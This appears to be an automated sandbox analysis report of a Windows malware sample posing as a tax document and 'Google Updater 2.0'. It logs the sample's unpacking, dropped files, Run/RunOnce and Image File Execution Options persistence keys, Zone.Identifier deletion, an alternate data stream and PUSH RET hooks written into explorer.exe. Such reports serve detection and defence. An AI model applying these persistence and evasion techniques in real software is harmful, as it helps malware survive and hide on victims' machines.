Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Unpacked PE file: 21.2.9sek3aw7533q9.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Unpacked PE file: 32.2.9sek3aw7533q9.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Unpacked PE file: 2.2.Documento--SII--33875.exe.400000.0.unpack
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Unpacked PE file: 14.2.9sek3aw7533q9.exe.400000.0.unpack
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Unpacked PE file: 21.2.9sek3aw7533q9.exe.400000.0.unpack
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Unpacked PE file: 32.2.9sek3aw7533q9.exe.400000.0.unpack

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Code function: 1_2_00468B80 InterlockedIncrement,LoadLibraryA,GetProcAddress,OutputDebugStringA,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,WriteFile,OutputDebugStringA,InterlockedDecrement,InterlockedDecrement,

Source: Documento--SII--33875.exe	Static PE information: section name: .rdaals2
Source: 9sek3aw7533q9_1.exe.3.dr	Static PE information: section name: .rdaals2

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 1_2_004659F0 push eax; ret
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Code function: 1_2_004659F0 push eax; ret
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: 11_2_004659F0 push eax; ret
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Code function: 11_2_004659F0 push eax; ret

Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

PE file moved: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe

Jump to behavior

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Users\user\Desktop\Documento--SII--33875.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9sek3aw7533q9.exe DisableExceptionChainValidation

Jump to behavior

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9sek3aw7533q9.exe DisableExceptionChainValidation			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe Debugger			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0	Jump to behavior
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0	Jump to behavior
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0	Jump to behavior
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0	Jump to behavior
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Creates files in alternative data streams (ADS)

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe:14EDFC78

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	File opened: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe:Zone.Identifier read attributes \| delete
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	File opened: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe:Zone.Identifier read attributes \| delete

Overwrites Windows DLL code with PUSH RET codes

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 2244 base: 77A077F0 value: 68 F3 81 78 04 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 240 base: 77A077F0 value: 68 F3 81 CA 03 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 4644 base: 77A077F0 value: 68 F3 81 30 04 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 3060 base: 77A077F0 value: 68 F3 81 C4 03 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 4668 base: 77A077F0 value: 68 F3 81 C0 03 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 4612 base: 77A077F0 value: 68 F3 81 87 03 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 2588 base: 77A077F0 value: 68 F3 81 F0 03 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 1688 base: 77A077F0 value: 68 F3 81 00 04 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 2248 base: 77A077F0 value: 68 F3 81 D0 03 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 2188 base: 77A077F0 value: 68 F3 81 19 04 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 3332 base: 77A077F0 value: 68 F3 81 5A 04 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 2036 base: 77A077F0 value: 68 F3 81 13 04 C3
Source: C:\Windows\SysWOW64\explorer.exe	Memory written: PID: 7416 base: 77A077F0 value: 68 F3 81 B6 05 C3

Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Documento--SII--33875.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
